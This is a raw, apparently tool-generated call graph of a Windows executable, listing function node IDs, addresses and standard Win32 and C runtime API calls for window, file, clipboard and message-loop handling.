75903->75811 75904->75821 75905->75811 75906->75828 75907->75811 75908->75811 75909->75811 75910->75811 75911->75811 75912->75811 75913->75811 75914->75800 75915->75785 75916->75801 75917->75785 75918->75785 75920 4508e0 GetModuleFileNameA 75919->75920 75921 43eb88 75920->75921 75950 43eb5e 75921->75950 75923 43eb97 75923->75842 75925 458d23 75924->75925 75931 450964 75924->75931 75926 458d46 75925->75926 75927 458ad4 2 API calls 75925->75927 75925->75931 76015 43ea66 19 API calls _write_multi_char 75926->76015 75927->75926 75929 458d53 75930 43f4ed _write_multi_char 2 API calls 75929->75930 75930->75931 75932 458c2d 75931->75932 75935 450975 75932->75935 75936 458c51 75932->75936 75934 440b23 6 API calls 75934->75936 75937 458ad4 75935->75937 75936->75934 75936->75935 76016 43cd10 75936->76016 75938 458aed 75937->75938 75939 43f4ed _write_multi_char 2 API calls 75938->75939 75940 458af9 75939->75940 75941 45097c 75940->75941 75942 43f4ed _write_multi_char 2 API calls 75940->75942 75941->75849 75943 458bbc 75942->75943 75943->75941 75944 43f4ed _write_multi_char 2 API calls 75943->75944 75944->75941 75947 450ac4 75945->75947 75946 450a7a 75946->75871 75947->75946 76023 415edb GetTickCount 75947->76023 75949->75859 75956 442009 75950->75956 75953 43eb67 75953->75923 75957 44201c 75956->75957 75959 43eb63 75956->75959 75958 43f68a __getbuf 6 API calls 75957->75958 75957->75959 75958->75959 75959->75953 75960 43d0a4 75959->75960 75963 43d0c3 75960->75963 75961 43d1e0 75961->75923 75963->75961 75964 43fc06 75963->75964 75965 43fc21 75964->75965 75973 43fc90 _write_multi_char 75965->75973 75986 43fed6 75965->75986 75968 43fdbf CreateFileA 75969 43fdf0 GetLastError 75968->75969 75970 43fdde GetFileType 75968->75970 75969->75973 75971 43fde9 CloseHandle 75970->75971 75972 43fdff 75970->75972 75971->75969 75990 440029 SetStdHandle 75972->75990 75973->75961 75975 43fe1a 75975->75973 75991 43f4ed 75975->75991 75977 43fe58 75984 43fe63 75977->75984 76003 440b23 75977->76003 75980 43fed0 75981 43fe9b 75982 43feb1 75981->75982 76013 43db69 23 API calls 2 library calls 75981->76013 75983 43f4ed _write_multi_char 2 API calls 75982->75983 75982->75984 75983->75984 75984->75973 75996 43dcc5 75984->75996 75988 43feeb 75986->75988 75987 43f68a __getbuf 6 API calls 75989 43fd9e 75987->75989 75988->75987 75988->75989 75989->75968 75989->75973 75990->75975 75992 43f4fc _write_multi_char 75991->75992 75994 43f545 _write_multi_char 75991->75994 75993 43f525 SetFilePointer 75992->75993 75992->75994 75993->75994 75995 43f53d GetLastError 75993->75995 75994->75977 75995->75994 75999 43dcd9 _write_multi_char 75996->75999 76002 43dd46 _write_multi_char 75996->76002 75997 43dd3e 76014 43ff73 SetStdHandle 75997->76014 75999->75997 76000 43dd28 FindCloseChangeNotification 75999->76000 75999->76002 76000->75997 76001 43dd34 GetLastError 76000->76001 76001->75997 76002->75980 76005 440b3b 76003->76005 76007 440bbe _write_multi_char 76003->76007 76004 440b98 ReadFile 76006 440bb1 GetLastError 76004->76006 76010 440be1 76004->76010 76005->76004 76005->76007 76006->76007 76007->75981 76008 440c5d ReadFile 76009 440c7b GetLastError 76008->76009 76011 440c85 76008->76011 76009->76010 76009->76011 76010->76007 76010->76008 76011->76010 76012 43f4ed _write_multi_char 2 API calls 76011->76012 76012->76011 76013->75982 76014->76002 76015->75929 76017 43cd20 76016->76017 76021 43cd2c 76016->76021 76018 43cd49 76017->76018 76017->76021 76022 43d060 6 API calls __getbuf 76017->76022 76020 440b23 6 API calls 76018->76020 76020->76021 76021->75936 76022->76018 76023->75947 76024->75877 76025->75899 76026->75878 76027->75878 76028->75705 76029->75709 76030->75717 76031->75749 76034 401da6 76032->76034 76033 401dc0 76033->75730 76034->76033 76040 401dcc 47 API calls 76034->76040 76036->75742 76037->75749 76038->75749 76039->75744 76040->76033 76042 43f687 76041->76042 76044 43f665 __getbuf 76041->76044 76042->75636 76044->76042 76045 43f618 76044->76045 76046 43f626 76045->76046 76047 43f634 76045->76047 76046->76047 76051 440f56 5 API calls __getbuf 76046->76051 76049 43f64d RtlAllocateHeap 76047->76049 76050 43f65c 76047->76050 76049->76050 76050->76044 76051->76047 76052 404947 76099 43a0d6 76052->76099 76054 402d18 GetTickCount 76056 402d34 PeekMessageA 76054->76056 76059 402cf9 76054->76059 76057 402d56 GetTickCount 76056->76057 76058 402d4b 76056->76058 76057->76059 76058->76057 76059->76054 76060 402e16 GetTickCount 76059->76060 76062 425baf 137 API calls 76059->76062 76065 416d44 37 API calls 76059->76065 76066 402e47 76059->76066 76067 40903d 86 API calls 76059->76067 76070 41a263 50 API calls 76059->76070 76071 40184e 47 API calls 76059->76071 76073 442502 49 API calls 76059->76073 76074 43eb88 41 API calls 76059->76074 76085 409f1b 76059->76085 76173 44374a GlobalUnlock CloseClipboard 76059->76173 76174 4029b5 76059->76174 76195 401fbc 49 API calls 76059->76195 76196 4016b8 169 API calls 76059->76196 76197 40a134 137 API calls 5 library calls 76059->76197 76198 419c22 38 API calls 2 library calls 76059->76198 76199 43ea10 26 API calls ___initmbctable 76059->76199 76202 4013a5 176 API calls 76059->76202 76203 401d5e 47 API calls 76059->76203 76204 443c79 84 API calls 76059->76204 76205 401abf 92 API calls 76059->76205 76206 417d99 137 API calls 76059->76206 76207 44c1bc 137 API calls 2 library calls 76059->76207 76060->76059 76060->76066 76062->76059 76065->76059 76066->76059 76081 40332f RegCloseKey 76066->76081 76200 419eef 38 API calls 76066->76200 76201 40a357 39 API calls 3 library calls 76066->76201 76067->76059 76070->76059 76071->76059 76073->76059 76074->76059 76081->76059 76086 409f38 76085->76086 76098 409f7e 76085->76098 76208 40c597 76086->76208 76088 409f3f 76089 43f68a __getbuf 6 API calls 76088->76089 76094 409f47 _strcat ___initmbctable _strlen 76088->76094 76090 409f62 76089->76090 76091 409f6a 76090->76091 76090->76094 76212 44c1bc 137 API calls 2 library calls 76091->76212 76093 40a01c 76093->76098 76214 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76093->76214 76094->76093 76096 40a0f0 76094->76096 76096->76098 76213 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76096->76213 76098->76059 76216 41767a 76099->76216 76101 43a0f3 76102 43a0ff 76101->76102 76105 43a115 76101->76105 76270 44c1bc 137 API calls 2 library calls 76102->76270 76104 43a198 76106 43a110 76104->76106 76108 43a333 76104->76108 76109 43a413 76104->76109 76110 43a381 76104->76110 76111 43a3c5 76104->76111 76112 43a294 76104->76112 76113 43a1b9 76104->76113 76114 43a1ff 76104->76114 76107 43a142 GetForegroundWindow 76105->76107 76134 43a16a 76105->76134 76106->76059 76107->76104 76115 43a14e 76107->76115 76122 43a356 76108->76122 76123 43a338 76108->76123 76116 43a436 76109->76116 76117 43a418 76109->76117 76118 43a386 76110->76118 76119 43a3a4 76110->76119 76126 43a3ca 76111->76126 76127 43a3e8 76111->76127 76124 43a299 76112->76124 76125 43a318 76112->76125 76128 43a1e2 76113->76128 76129 43a1be 76113->76129 76120 43a222 76114->76120 76121 43a204 76114->76121 76115->76104 76130 43a15b IsWindowVisible 76115->76130 76153 43a447 GetModuleHandleA GetProcAddress 76116->76153 76166 43a46a 76116->76166 76172 43a1f4 76116->76172 76282 43caaf 71 API calls ___initmbctable 76117->76282 76280 43caaf 71 API calls ___initmbctable 76118->76280 76133 43a3ac 76119->76133 76119->76172 76143 43a22a GetWindowThreadProcessId 76120->76143 76120->76172 76274 43caaf 71 API calls ___initmbctable 76121->76274 76144 43a35e IsZoomed 76122->76144 76122->76172 76279 43caaf 71 API calls ___initmbctable 76123->76279 76124->76172 76277 40a6d3 32 API calls 76124->76277 76245 43a6ae 76125->76245 76281 43caaf 71 API calls ___initmbctable 76126->76281 76136 43a3f0 GetWindowLongA 76127->76136 76127->76172 76139 43a1e9 76128->76139 76128->76172 76272 43caaf 71 API calls ___initmbctable 76129->76272 76130->76104 76131 43a166 76130->76131 76131->76104 76253 43a58e 76133->76253 76134->76104 76271 43b9f1 IsWindow IsWindowVisible GetWindowLongA 76134->76271 76149 43a4ac 76136->76149 76273 40c83f 47 API calls 76139->76273 76156 43a249 76143->76156 76171 43a23b 76143->76171 76157 43a36e IsIconic 76144->76157 76144->76171 76145 43a39f 76145->76119 76148 43a3e3 76148->76127 76149->76172 76283 40a7af 32 API calls _write_multi_char 76149->76283 76150 43a1dd 76150->76128 76151 43a431 76151->76116 76153->76166 76154 43a21d 76154->76120 76155 43a351 76155->76122 76162 43a274 76156->76162 76163 43a26d 76156->76163 76157->76171 76159 40184e 47 API calls 76159->76106 76161 401c1f 47 API calls 76161->76106 76276 4284ca 57 API calls 2 library calls 76162->76276 76275 4286a3 61 API calls 2 library calls 76163->76275 76166->76149 76169 43a48c 76166->76169 76166->76172 76167 43a272 76167->76172 76168 43a2da 76168->76106 76278 40c83f 47 API calls 76168->76278 76169->76171 76169->76172 76171->76161 76172->76106 76172->76159 76173->76054 76175 4029cd 76174->76175 76179 4029d6 76174->76179 76418 402803 141 API calls 76175->76418 76177 4029dd 76177->76059 76178 402a02 76420 44c1bc 137 API calls 2 library calls 76178->76420 76179->76177 76179->76178 76181 402a3b 76179->76181 76193 402a7b 76179->76193 76419 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76179->76419 76183 43f68a __getbuf 6 API calls 76181->76183 76184 402a54 76183->76184 76184->76178 76184->76193 76185 402c68 76185->76177 76187 402c95 SetTimer 76185->76187 76186 402ab7 76186->76185 76424 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76186->76424 76187->76177 76193->76186 76194 401e61 86 API calls 76193->76194 76345 4075c4 76193->76345 76421 402938 86 API calls 76193->76421 76422 40a974 141 API calls 76193->76422 76423 4026e4 86 API calls 76193->76423 76194->76193 76195->76059 76196->76059 76197->76059 76198->76059 76199->76059 76200->76066 76201->76066 76202->76059 76203->76059 76204->76059 76205->76059 76206->76059 76207->76059 76209 40c5a7 76208->76209 76211 40c5a3 _strlen 76208->76211 76209->76211 76215 401d73 86 API calls _strlen 76209->76215 76211->76088 76212->76098 76213->76098 76214->76098 76215->76211 76217 4177c2 76216->76217 76218 417687 76216->76218 76217->76101 76218->76217 76219 442502 49 API calls 76218->76219 76220 41769b 76219->76220 76220->76217 76221 442502 49 API calls 76220->76221 76222 4176b0 76221->76222 76223 442502 49 API calls 76222->76223 76243 4176b6 76222->76243 76224 4176c8 76223->76224 76225 442502 49 API calls 76224->76225 76224->76243 76226 4176e0 76225->76226 76227 442502 49 API calls 76226->76227 76226->76243 76228 4176f8 76227->76228 76229 442502 49 API calls 76228->76229 76228->76243 76230 417710 76229->76230 76231 442502 49 API calls 76230->76231 76230->76243 76232 417728 76231->76232 76233 442502 49 API calls 76232->76233 76232->76243 76234 417740 76233->76234 76235 442502 49 API calls 76234->76235 76234->76243 76236 417755 76235->76236 76237 442502 49 API calls 76236->76237 76236->76243 76238 41776a 76237->76238 76239 442502 49 API calls 76238->76239 76238->76243 76240 41777f 76239->76240 76240->76243 76284 442545 76240->76284 76242 417796 76242->76243 76244 442502 49 API calls 76242->76244 76243->76101 76244->76243 76246 43a6bb ___initmbctable 76245->76246 76289 43be25 76246->76289 76249 43a703 EnumWindows 76250 43a715 76249->76250 76251 401c1f 47 API calls 76250->76251 76252 43a728 76251->76252 76252->76106 76328 458250 76253->76328 76256 43a5ee 76257 40184e 47 API calls 76256->76257 76259 43a5fc 76257->76259 76258 43a601 76260 40184e 47 API calls 76258->76260 76259->76106 76261 43a627 76260->76261 76261->76259 76330 401e61 76261->76330 76263 43a659 76264 43a667 EnumChildWindows 76263->76264 76265 401d9f 47 API calls 76264->76265 76266 43a682 76265->76266 76267 43a69c 76266->76267 76268 401e61 86 API calls 76266->76268 76336 40c556 12 API calls 76267->76336 76268->76267 76270->76106 76271->76104 76272->76150 76339 43b8dd IsWindowVisible GetWindowTextA GetWindowThreadProcessId GetClassNameA 76272->76339 76273->76106 76274->76154 76340 43b8dd 4 API calls 76274->76340 76275->76167 76276->76172 76277->76168 76278->76172 76279->76155 76341 43b8dd 4 API calls 76279->76341 76280->76145 76342 43b8dd 4 API calls 76280->76342 76281->76148 76343 43b8dd 4 API calls 76281->76343 76282->76151 76344 43b8dd 4 API calls 76282->76344 76283->76172 76285 442596 76284->76285 76287 44254e 76284->76287 76285->76242 76286 4428bb 49 API calls 76286->76287 76287->76286 76288 442557 76287->76288 76288->76242 76290 43be3b _strlen 76289->76290 76303 439733 76290->76303 76292 43c08b _strlen 76296 43c0ca 76292->76296 76317 43c0d2 GetWindowTextA GetWindowThreadProcessId GetClassNameA 76292->76317 76294 43be93 _strlen 76294->76292 76295 43beef IsWindow 76294->76295 76298 43a6ff 76294->76298 76300 442545 49 API calls 76294->76300 76301 439733 49 API calls 76294->76301 76314 40105d 49 API calls 76294->76314 76315 401f02 49 API calls 76294->76315 76316 44fb8b 58 API calls 76294->76316 76295->76294 76295->76298 76298->76249 76298->76250 76300->76294 76301->76294 76318 4428bb 76303->76318 76306 439846 76306->76294 76308 43975d 76308->76306 76309 4428bb 49 API calls 76308->76309 76310 439782 76309->76310 76310->76306 76325 442990 49 API calls ___initmbctable 76310->76325 76312 439794 76312->76306 76313 4428bb 49 API calls 76312->76313 76313->76312 76314->76294 76315->76294 76316->76294 76317->76296 76320 4428d3 76318->76320 76323 43974b 76318->76323 76319 442900 76319->76323 76327 43d3f2 49 API calls 2 library calls 76319->76327 76320->76319 76320->76323 76326 4010c5 37 API calls ___initmbctable 76320->76326 76323->76306 76324 442990 49 API calls ___initmbctable 76323->76324 76324->76308 76325->76312 76326->76319 76327->76323 76329 43a59b EnumChildWindows 76328->76329 76329->76256 76329->76258 76332 401e68 76330->76332 76331 401e83 76335 401e8a 76331->76335 76338 443c33 68 API calls 76331->76338 76332->76331 76337 401dcc 47 API calls 76332->76337 76335->76263 76336->76259 76337->76331 76338->76335 76412 407614 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z ___initmbctable _strlen __allrem 76345->76412 76346 408bc7 76347 408bf5 76346->76347 76348 408be7 76346->76348 76355 408b46 76346->76355 76365 408b02 __shift _strlen 76346->76365 76356 408ddf 76347->76356 76359 408c07 76347->76359 76496 401b93 92 API calls 76348->76496 76349 408e5a 76349->76193 76352 408def 76352->76365 76502 4021ba 49 API calls 76352->76502 76354 408c8a 76358 401e61 86 API calls 76354->76358 76370 408ca5 _strlen 76354->76370 76355->76365 76497 40a6d3 32 API calls 76355->76497 76356->76352 76360 408e00 76356->76360 76356->76365 76361 408c9b 76358->76361 76359->76354 76359->76355 76359->76365 76501 402217 86 API calls 76360->76501 76498 401d73 86 API calls _strlen 76361->76498 76365->76349 76503 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76365->76503 76367 408ae9 76499 44c1bc 137 API calls 2 library calls 76367->76499 76368 408b22 76491 408f22 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76368->76491 76369 401d14 86 API calls 76369->76412 76370->76365 76375 43f68a __getbuf 6 API calls 76370->76375 76372 402162 86 API calls 76372->76412 76373 40184e 47 API calls 76373->76412 76374 408bad 76495 408f22 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76374->76495 76384 408cfb 76375->76384 76376 401d5e 47 API calls 76376->76412 76377 401cd2 86 API calls 76377->76412 76379 408b38 76492 408f22 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76379->76492 76380 408af4 76490 40c724 49 API calls ___initmbctable 76380->76490 76381 4026e4 86 API calls 76381->76412 76382 408b07 76388 40184e 47 API calls 76382->76388 76384->76367 76394 408d26 76384->76394 76388->76365 76389 401e61 86 API calls 76389->76412 76390 408b70 76494 408f22 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76390->76494 76391 4023de 86 API calls 76391->76412 76500 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76394->76500 76395 40c724 49 API calls 76395->76412 76396 40233a 86 API calls 76396->76412 76397 408b80 76401 40184e 47 API calls 76397->76401 76398 408b4e _strlen 76398->76397 76400 408b67 76398->76400 76493 40c724 49 API calls ___initmbctable 76400->76493 76401->76390 76402 40c829 47 API calls 76402->76412 76404 401b93 92 API calls 76404->76412 76405 408645 lstrcmpiA 76405->76412 76406 40874f lstrcmpiA 76406->76412 76407 408682 lstrcmpiA 76407->76412 76408 442502 49 API calls 76408->76412 76409 4086bc lstrcmpiA 76409->76412 76410 4086eb lstrcmpiA 76410->76412 76411 40871a lstrcmpiA 76411->76412 76412->76346 76412->76355 76412->76365 76412->76367 76412->76368 76412->76369 76412->76372 76412->76373 76412->76374 76412->76376 76412->76377 76412->76379 76412->76380 76412->76381 76412->76382 76412->76389 76412->76390 76412->76391 76412->76395 76412->76396 76412->76398 76412->76402 76412->76404 76412->76405 76412->76406 76412->76407 76412->76408 76412->76409 76412->76410 76412->76411 76413 401d73 86 API calls 76412->76413 76414 43f68a 6 API calls __getbuf 76412->76414 76415 40c7ab 86 API calls 76412->76415 76425 409303 76412->76425 76485 44e91c 58 API calls _strlen 76412->76485 76486 40c60e 6 API calls __getbuf 76412->76486 76487 408f22 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76412->76487 76488 40c556 12 API calls 76412->76488 76489 409ef4 47 API calls 76412->76489 76413->76412 76414->76412 76415->76412 76418->76179 76419->76181 76420->76177 76421->76193 76422->76193 76423->76193 76424->76185 76426 40932f 76425->76426 76430 40934b 76425->76430 76427 409338 76426->76427 76428 40934f 76426->76428 76429 409367 76426->76429 76426->76430 76504 401d14 86 API calls 76427->76504 76506 4020fe 86 API calls 76428->76506 76432 40184e 47 API calls 76429->76432 76430->76429 76434 4093cc 76430->76434 76437 40939d ___initmbctable 76430->76437 76439 401e61 86 API calls 76430->76439 76436 4099c8 76432->76436 76442 442545 49 API calls 76434->76442 76435 409357 76435->76430 76507 401c7f 86 API calls 76435->76507 76436->76412 76437->76429 76440 40959b 76437->76440 76452 401e61 86 API calls 76437->76452 76476 4023de 86 API calls 76437->76476 76509 409167 49 API calls 76437->76509 76510 40233a 86 API calls 76437->76510 76511 40105d 49 API calls 76437->76511 76512 401cd2 86 API calls 76437->76512 76438 40933e 76438->76430 76505 401cd2 86 API calls 76438->76505 76439->76434 76444 40975f 76440->76444 76446 4095b4 GetModuleHandleA GetModuleHandleA GetModuleHandleA GetModuleHandleA 76440->76446 76447 4095eb 76440->76447 76448 4093ef 76442->76448 76513 4099d3 49 API calls ___initmbctable 76444->76513 76446->76447 76449 401e61 86 API calls 76447->76449 76454 4095ff _strrchr 76447->76454 76450 4093f6 76448->76450 76453 442545 49 API calls 76448->76453 76449->76454 76508 409167 49 API calls 76450->76508 76452->76437 76453->76450 76460 4096c6 GetModuleHandleA 76454->76460 76461 409637 76454->76461 76455 409778 76482 4097b4 _strlen 76455->76482 76514 417d99 137 API calls 76455->76514 76458 40975a 76458->76436 76459 4099a8 FreeLibrary 76458->76459 76459->76436 76462 4096d9 LoadLibraryA 76460->76462 76463 4096fe GetProcAddress 76460->76463 76464 409652 GetProcAddress 76461->76464 76471 409670 ___initmbctable 76461->76471 76462->76463 76466 4096ef 76462->76466 76463->76444 76474 40970f ___initmbctable 76463->76474 76464->76444 76464->76461 76465 401e61 86 API calls 76465->76482 76466->76429 76468 4096c4 76468->76444 76470 409744 76468->76470 76475 40184e 47 API calls 76470->76475 76471->76444 76471->76468 76471->76470 76472 4096a6 GetProcAddress 76471->76472 76472->76444 76472->76471 76473 409728 76473->76470 76474->76468 76474->76473 76478 409735 GetProcAddress 76474->76478 76475->76458 76476->76437 76477 401c1f 47 API calls 76477->76482 76478->76468 76480 401d9f 47 API calls 76480->76482 76482->76458 76482->76465 76482->76477 76482->76480 76515 40c556 12 API calls 76482->76515 76516 40c829 47 API calls 76482->76516 76517 401d5e 47 API calls 76482->76517 76485->76412 76486->76412 76487->76412 76488->76412 76489->76412 76490->76365 76491->76365 76492->76355 76493->76390 76494->76365 76495->76365 76496->76365 76497->76365 76498->76370 76499->76365 76500->76365 76501->76365 76502->76365 76503->76365 76504->76438 76505->76430 76506->76435 76507->76430 76508->76437 76509->76437 76510->76437 76511->76437 76512->76437 76513->76455 76514->76482 76515->76482 76516->76482 76517->76482 76518 40bd27 76519 40bd31 76518->76519 76522 40bdaf 76518->76522 76520 40bd4d 76519->76520 76521 442502 49 API calls 76519->76521 76527 40bd5c __shift 76520->76527 76537 40c140 49 API calls _strlen 76520->76537 76523 40bd47 76521->76523 76522->76527 76538 44e80b 10 API calls 76522->76538 76523->76520 76523->76522 76526 40bef7 76539 440d11 13 API calls 3 library calls 76526->76539 76528 40bf9d 76528->76527 76530 442502 49 API calls 76528->76530 76535 40c002 __shift 76528->76535 76530->76528 76531 40bf76 76531->76527 76531->76528 76532 40bf4e 76532->76526 76532->76527 76533 40bdcb __shift 76533->76526 76533->76527 76533->76528 76533->76532 76534 43f68a __getbuf 6 API calls 76533->76534 76534->76532 76535->76527 76536 442502 49 API calls 76535->76536 76536->76535 76537->76527 76538->76533 76539->76531 76540 4041e7 76541 442545 49 API calls 76540->76541 76542 4041f9 76541->76542 76547 404235 76542->76547 76615 4090d1 86 API calls 76542->76615 76544 40423f 76545 4042e9 76544->76545 76546 404254 76544->76546 76618 43c932 88 API calls 76545->76618 76585 427ea5 76546->76585 76547->76544 76616 44fb8b 58 API calls 76547->76616 76551 4042cd 76551->76544 76552 4042d5 76551->76552 76617 44fbdd EnumWindows Sleep ___initmbctable 76552->76617 76554 402d18 GetTickCount 76556 402d34 PeekMessageA 76554->76556 76566 402cf9 76554->76566 76557 402d56 GetTickCount 76556->76557 76558 402d4b 76556->76558 76557->76566 76558->76557 76559 402e16 GetTickCount 76559->76566 76567 402e47 76559->76567 76560 4029b5 169 API calls 76560->76566 76561 425baf 137 API calls 76561->76566 76564 416d44 37 API calls 76564->76566 76565 442502 49 API calls 76565->76566 76566->76554 76566->76559 76566->76560 76566->76561 76566->76564 76566->76565 76566->76567 76568 40903d 86 API calls 76566->76568 76571 41a263 50 API calls 76566->76571 76572 40184e 47 API calls 76566->76572 76574 43eb88 41 API calls 76566->76574 76578 409f1b 137 API calls 76566->76578 76603 44374a GlobalUnlock CloseClipboard 76566->76603 76604 401fbc 49 API calls 76566->76604 76605 4016b8 169 API calls 76566->76605 76606 40a134 137 API calls 5 library calls 76566->76606 76607 419c22 38 API calls 2 library calls 76566->76607 76608 43ea10 26 API calls ___initmbctable 76566->76608 76611 4013a5 176 API calls 76566->76611 76612 401d5e 47 API calls 76566->76612 76613 443c79 84 API calls 76566->76613 76614 401abf 92 API calls 76566->76614 76619 417d99 137 API calls 76566->76619 76620 44c1bc 137 API calls 2 library calls 76566->76620 76567->76566 76581 40332f RegCloseKey 76567->76581 76609 419eef 38 API calls 76567->76609 76610 40a357 39 API calls 3 library calls 76567->76610 76568->76566 76571->76566 76572->76566 76574->76566 76578->76566 76581->76566 76586 427eb0 76585->76586 76621 43b175 76586->76621 76589 427f74 76589->76566 76590 427ef7 76593 427efa 76590->76593 76594 427f1e 76590->76594 76591 427f2d 76635 43c146 6 API calls 76591->76635 76596 427f0f 76593->76596 76599 427efd 76593->76599 76634 43c146 6 API calls 76594->76634 76633 43c146 6 API calls 76596->76633 76598 427f15 76598->76589 76598->76599 76599->76589 76600 427f48 ShowWindow 76599->76600 76600->76589 76601 427f5d 76600->76601 76601->76589 76602 427f6b Sleep 76601->76602 76602->76589 76603->76554 76604->76566 76605->76566 76606->76566 76607->76566 76608->76566 76609->76567 76610->76567 76611->76566 76612->76566 76613->76566 76614->76566 76615->76547 76616->76551 76617->76567 76639 45022c 80 API calls 76617->76639 76618->76567 76619->76566 76620->76566 76622 43b190 76621->76622 76623 43b1cd 76622->76623 76627 43b1a5 GetForegroundWindow 76622->76627 76624 43b1eb 76623->76624 76629 43b1dd 76623->76629 76637 43caaf 71 API calls ___initmbctable 76624->76637 76626 43b1c9 76632 427ed4 76626->76632 76628 43b1b1 76627->76628 76627->76632 76630 43b1be IsWindowVisible 76628->76630 76628->76632 76636 43b9f1 IsWindow IsWindowVisible GetWindowLongA 76629->76636 76630->76626 76630->76632 76632->76589 76632->76590 76632->76591 76633->76598 76634->76598 76635->76598 76636->76632 76637->76626 76638 43b8dd 4 API calls 76637->76638 76640 442ba3 76641 442baf GetModuleHandleA 76640->76641 76642 442bea 76641->76642 76661 43edbb HeapCreate 76642->76661 76644 442c1c 76669 43f27a 76644->76669 76651 442c75 76712 441ea1 76651->76712 76658 442cba GetModuleHandleA 76660 44770d 76658->76660 76662 43ee05 76661->76662 76663 43eddb 76661->76663 76662->76644 76664 43edea 76663->76664 76665 43ee08 76663->76665 76732 441752 HeapAlloc 76664->76732 76665->76644 76667 43edf4 76667->76665 76668 43edf9 HeapDestroy 76667->76668 76668->76662 76670 43f68a __getbuf 6 API calls 76669->76670 76672 43f287 76670->76672 76671 43f28c GetCommandLineA 76682 43d2d0 76671->76682 76672->76671 76673 43f2c9 GetStartupInfoA 76672->76673 76679 43f3a9 76673->76679 76680 43f2e3 76673->76680 76674 43f3d0 GetStdHandle 76676 43f3de GetFileType 76674->76676 76674->76679 76675 43f410 SetHandleCount 76675->76671 76676->76679 76677 43f355 76677->76679 76681 43f377 GetFileType 76677->76681 76678 43f68a __getbuf 6 API calls 76678->76680 76679->76674 76679->76675 76680->76677 76680->76678 76680->76679 76681->76677 76683 43d30b 76682->76683 76684 43d2ec GetEnvironmentStringsW 76682->76684 76686 43d2f4 76683->76686 76687 43d39b 76683->76687 76685 43d300 GetLastError 76684->76685 76684->76686 76685->76683 76689 43d322 GetEnvironmentStringsW 76686->76689 76690 43d32a WideCharToMultiByte 76686->76690 76688 43d3a7 GetEnvironmentStrings 76687->76688 76691 43d3a3 76687->76691 76688->76691 76692 43d3b3 76688->76692 76689->76690 76689->76691 76694 43d390 FreeEnvironmentStringsW 76690->76694 76695 43d35e 76690->76695 76705 441dff 76691->76705 76696 43f68a __getbuf 6 API calls 76692->76696 76694->76691 76697 43f68a __getbuf 6 API calls 76695->76697 76704 43d3cc 76696->76704 76698 43d364 76697->76698 76698->76694 76699 43d36d WideCharToMultiByte 76698->76699 76701 43d37e 76699->76701 76702 43d387 76699->76702 76700 43d3e2 FreeEnvironmentStringsA 76700->76691 76733 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76701->76733 76702->76694 76704->76700 76706 441e16 GetModuleFileNameA 76705->76706 76707 441e11 76705->76707 76709 441e3e 76706->76709 76734 43f87f 53 API calls ___initmbctable 76707->76734 76710 43f68a __getbuf 6 API calls 76709->76710 76711 441e69 76710->76711 76711->76651 76713 441eb3 _strlen 76712->76713 76714 441eae 76712->76714 76716 441ebf 76713->76716 76717 43f68a __getbuf 6 API calls 76713->76717 76735 43f87f 53 API calls ___initmbctable 76714->76735 76724 43e081 76716->76724 76722 441ee4 _strcat _strlen 76717->76722 76718 441f2d 76736 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76718->76736 76720 43f68a __getbuf 6 API calls 76720->76722 76721 441f52 76737 43ec47 HeapFree VirtualFree VirtualFree HeapFree ___initmbctable 76721->76737 76722->76716 76722->76718 76722->76720 76722->76721 76725 43e08a 76724->76725 76727 43e0c6 GetStartupInfoA 76725->76727 76738 43fbf4 14 API calls 76725->76738 76728 442acd 76727->76728 76729 442ad9 76728->76729 76731 442ade __wincmdln 76728->76731 76739 43f87f 53 API calls ___initmbctable 76729->76739 76731->76658 76732->76667 76733->76702 76734->76706 76735->76713 76736->76716 76737->76716 76738->76727 76739->76731 77012 40e5d9 77022 40e5e1 77012->77022 77013 40e945 GetForegroundWindow 77014 40e955 GetWindowThreadProcessId 77013->77014 77016 40e96a GetClassNameA 77014->77016 77015 40df54 GetTickCount 77066 40df68 77015->77066 77016->77022 77019 40e98f IsDialogMessageA 77019->77022 77022->77013 77022->77015 77022->77019 77024 40e9ca SetCurrentDirectoryA 77022->77024 77026 40e793 DragQueryFileA 77022->77026 77027 40e7b7 DragFinish 77022->77027 77022->77066 77071 41199a 77022->77071 77080 411a42 76 API calls 77022->77080 77082 40fd3d 76 API calls 77022->77082 77023 40df84 GetMessageA 77023->77015 77025 40dfa6 GetTickCount 77023->77025 77025->77066 77026->77022 77027->77015 77028 40ea40 GetTickCount 77028->77066 77029 401e61 86 API calls 77029->77066 77032 40e04e GetFocus 77032->77066 77034 40e595 ShowWindow 77034->77015 77036 40eaaa GetTickCount 77036->77066 77037 40e410 IsDialogMessageA 77037->77066 77038 43b97f GetWindowLongA GetParent GetWindowLongA 77038->77066 77039 40e355 GetFocus 77039->77066 77040 40e345 GetKeyState 77040->77039 77040->77066 77042 40eb0e CountClipboardFormats 77046 40eb18 IsClipboardFormatAvailable 77042->77046 77042->77066 77049 40eb26 IsClipboardFormatAvailable 77046->77049 77046->77066 77048 40ed4b GetWindowLongA SetWindowLongA 77048->77066 77049->77066 77050 40ef48 GetTickCount 77050->77066 77051 40e3c1 SendMessageA 77051->77015 77052 4395f0 GetWindowRect 77052->77066 77053 432668 GetDlgCtrlID GetParent GetDlgCtrlID 77053->77066 77054 401c1f 47 API calls 77054->77066 77055 40184e 47 API calls 77055->77066 77057 40e559 77058 40ec3b SendMessageA 77058->77066 77059 40e506 77059->77057 77065 40e547 KillTimer 77059->77065 77060 40ebf4 ScreenToClient 77062 40ec1a SendMessageA 77060->77062 77061 40e2b9 GetKeyState 77061->77066 77062->77066 77065->77057 77066->77013 77066->77015 77066->77022 77066->77028 77066->77029 77066->77032 77066->77034 77066->77037 77066->77038 77066->77039 77066->77040 77066->77042 77066->77050 77066->77051 77066->77052 77066->77053 77066->77054 77066->77055 77066->77058 77066->77059 77066->77060 77066->77061 